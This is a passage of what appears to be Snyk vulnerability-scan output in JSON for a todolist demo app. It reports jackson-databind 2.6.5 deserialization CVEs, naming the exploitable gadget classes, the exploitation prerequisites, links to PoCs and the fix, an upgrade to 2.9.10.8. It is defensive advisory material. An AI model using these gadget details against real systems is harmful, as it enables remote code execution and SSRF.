io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36183) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36179) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36182) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36185) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36189) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36188) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36181) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2021-20190) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n# Remediation\nUpgrade 